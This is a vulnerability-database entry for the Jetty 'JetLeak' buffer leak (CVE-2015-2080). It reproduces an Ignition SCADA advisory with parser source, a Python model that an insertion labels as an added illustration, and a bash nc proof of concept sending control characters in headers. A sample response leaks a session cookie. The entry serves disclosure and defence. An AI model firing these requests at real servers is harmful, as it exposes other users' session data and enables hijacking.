Eclipse Jetty Information Disclosure Vulnerability

Vulnerability ID: 1123240    Vulnerability type: Information disclosure
Published: 2016-02-17    Updated: 2018-06-11
CVE: CVE-2015-2080    CNNVD ID: CNNVD-201503-032
Platform: Multiple    CVSS score: 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/39455
https://www.securityfocus.com/bid/72768
https://cxsecurity.com/issue/WLB-2016020156
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201503-032
|Vulnerability details
Eclipse Jetty is a free and open-source project of the Eclipse Foundation: a Java-based web server and Java Servlet container. Versions of Eclipse Jetty before 9.2.9.v20150224 contain a security vulnerability in the exception-handling code. A remote attacker can exploit it by placing illegal characters in HTTP headers to obtain sensitive information from process memory.
|Exploit
Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers
Vendor: Inductive Automation
Product web page: http://www.inductiveautomation.com
Affected version: 7.8.1 (b2016012216) and 7.8.0 (b2015101414)
Platform: Java

Summary: Ignition is a powerful industrial application platform with
fully integrated development tools for building SCADA, MES, and IIoT
solutions.

Desc: Remote unauthenticated attackers are able to read arbitrary data
from other HTTP sessions because Ignition uses a vulnerable Jetty server.
When the Jetty web server receives an HTTP request, the code below is used
to parse the HTTP headers and their associated values. The server
begins by looping through each character of a given header value and checks
the following:

- On Line 1164, the server checks if the character is printable ASCII or
not a valid ASCII character.
- On Line 1172, the server checks if the character is a space or tab.
- On Line 1175, the server checks if the character is a line feed.
- If the character is non-printable ASCII (less than 0x20 and neither a
space, tab, nor line feed), then all of the checks above are skipped over
and the code throws an 'IllegalCharacter' exception on line 1186, passing
in the illegal character and a shared buffer.


---------------------------------------------------------------------------
File: jetty-http\src\main\java\org\eclipse\jetty\http\HttpParser.java
---------------------------------------------------------------------------
920: protected boolean parseHeaders(ByteBuffer buffer)
921: {
[..snip..]
1163:     case HEADER_VALUE:
1164:         if (ch>HttpTokens.SPACE || ch<0)
1165:         {
1166:             _string.append((char)(0xff&ch));
1167:             _length=_string.length();
1168:             setState(State.HEADER_IN_VALUE);
1169:             break;
1170:         }
1171:
1172:         if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB)
1173:            break;
1174:
1175:         if (ch==HttpTokens.LINE_FEED)
1176:         {
1177:             if (_length > 0)
1178:             {
1179:                 _value=null;
1180:                 _valueString=(_valueString==null)?takeString():(_valueString+" "+takeString());
1181:             }
1182:             setState(State.HEADER);
1183:             break;
1184:         }
1185:
1186:         throw new IllegalCharacter(ch,buffer);
---------------------------------------------------------------------------
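As an added illustration (not code from the advisory or from Jetty itself), the Python model below replays the HEADER_VALUE checks above over a shared buffer and contrasts the vulnerable error message, which dumps the buffer including bytes left over from an earlier request, with a hardened one that names only the offending byte; reason_phrase_leaks() is a defender-side check for the dump pattern in a 400 reason phrase. The function names, the stale cookie bytes and the CR handling are assumptions constructed for the example.

```python
import re
SPACE, TAB, LF, CR = 0x20, 0x09, 0x0A, 0x0D
class IllegalCharacter(Exception):
    """Stand-in for Jetty's IllegalCharacter; its message becomes the 400 reason phrase."""
def header_value_action(ch: int) -> str:
    """The HEADER_VALUE branch of HttpParser, applied to a signed byte as Java sees it."""
    if ch > SPACE or ch < 0:      # printable ASCII, or a high byte (negative in Java)
        return "append"
    if ch in (SPACE, TAB):        # whitespace around the value is skipped
        return "skip"
    if ch == LF:                  # line feed ends the value
        return "end"
    return "illegal"              # every other control character falls through to the throw

def buffer_detail(buf: bytearray, pos: int, limit: int) -> str:
    """Dump shaped like the vulnerable message; bytes past `limit` are stale leftovers in the shared buffer."""
    esc = lambda b: b.decode("latin-1").replace("\r", "\\r").replace("\n", "\\n")
    return f"'{esc(buf[:pos])}<<<{esc(buf[pos:limit])}>>>{esc(buf[limit:])}'"

def parse_header_value(buf: bytearray, start: int, limit: int, hardened: bool) -> bytes:
    """Consume one header value; hardened=False embeds the whole buffer in the error (the bug)."""
    value = bytearray()
    for pos in range(start, limit):
        raw = buf[pos]
        if raw == CR:             # modelled on HttpParser.next(), which consumes the CR of a CRLF
            continue
        action = header_value_action(raw - 256 if raw >= 0x80 else raw)
        if action == "append":
            value.append(raw)
        elif action == "end":
            break
        elif action == "illegal":
            msg = f"Illegal character 0x{raw:X} in state=HEADER_VALUE"
            if not hardened:
                msg += " in " + buffer_detail(buf, pos, limit)
            raise IllegalCharacter(msg)
    return bytes(value)

def reason_phrase_leaks(reason: str) -> bool:
    """Defensive check on a 400 reason phrase: a <<<...>>> dump with bytes after >>> is the signature."""
    return re.search(r"Illegal character .* in '.*<<<.*>>>.+'", reason, re.S) is not None
def demo(hardened: bool) -> str:
    """Error text for a NUL in the Referer value, parsed from a buffer whose tail holds another client's cookie (constructed)."""
    request = b"GET / HTTP/1.1\r\nHost: localhost\r\nReferer: \x00\r\n\r\n"
    buf = bytearray(request + b"Cookie: SESSIONID=previousclientsecret\r\n")  # constructed stale tail
    start = request.index(b"Referer:") + len(b"Referer:")
    try:
        parse_header_value(buf, start, len(request), hardened)
        return ""
    except IllegalCharacter as e:
        return str(e)
```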


Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)
           Ubuntu Linux 14.04
           Mac OS X
           HP-UX Itanium
           Jetty(9.2.z-SNAPSHOT)
           Java/1.8.0_73
           Java/1.8.0_66


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2016-5306
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php

CVE: CVE-2015-2080
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080

Original: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
Jetleak Test script: https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py
Eclipse: http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md
         https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md


14.01.2016

---


#######################
#!/bin/bash
# Sends one ordinary request, then one whose header name and value carry a BEL (0x07),
# a control character below 0x20 that reaches the IllegalCharacter throw shown above.

#RESOURCEPATH="/main/web/config/alarming.schedule?4674-1.IBehaviorListener.0-demo"
RESOURCEPATH="/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo"
BAD=$'\a'   # BEL, 0x07

function normalRequest {
echo "-- Normal Request --"

nc localhost 8088 << NORMREQ
POST $RESOURCEPATH HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Connection: close
Content-Length: 63

NORMREQ
}

function badCookie {
echo "-- Bad Cookie --"

nc localhost 8088 << BADCOOKIE
GET $RESOURCEPATH HTTP/1.1
Host: localhost
Coo${BAD}kie: ${BAD}

BADCOOKIE
}

normalRequest
echo ""
echo ""
badCookie

#######################



Original raw analysis request via proxy using Referer:
------------------------------------------------------

GET /main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo&_=1452849939485 HTTP/1.1
Host: localhost:8088
Accept: application/xml, text/xml, */*; q=0.01
X-Requested-With: XMLHttpRequest
Wicket-Ajax: true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Wicket-Ajax-BaseURL: config/conf.modules?51461
Referer: \x00


Response leaking part of Cookie session:
----------------------------------------

HTTP/1.1 400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\r\nReferer: \x00<<<\r\nAccept-Encoding...tion: close\r\n\r\n>>>SESSIONID=15iwe0g...\x0fCU\xFa\xBf\xA4j\x12\x83\xCb\xE61~S\xD1'
Content-Length: 0
Connection: close
Server: Jetty(9.2.z-SNAPSHOT)
|Affected products
The Eclipse Foundation Jetty 9.2.9.v20150224
Juniper Steel-Belted Radius Carrier 8.4.1-R5
Juniper Steel-Belted Radius Carrier 8.3.0-R11
Juniper Steel-Belted Radius Carrier 8.2.0-R18
|References

Source: SECTRACK
Link: http://www.securitytracker.com/id/1031800
Source: github.com
Link: https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
Source: MLIST
Link: http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00075.html
Source: FULLDISC
Link: http://seclists.org/fulldisclosure/2015/Mar/12
Source: blog.gdssecurity.com
Link: https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
Source: MLIST
Link: http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html
Source: FEDORA
Link: http://lists.fedoraproject.org/pipermail/package-announce/2015-March/151804.html
Source: BUGTRAQ
Link: http://www.securityfocus.com/archive/1/archive/1/534755/100/1600/threaded
Source: BID
Link: http://www.securityfocus.com/bid/72768
Source: packetstormsecurity.com
Link: http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
Source: SECUNIA
Link: http://secunia.com/advisories/64235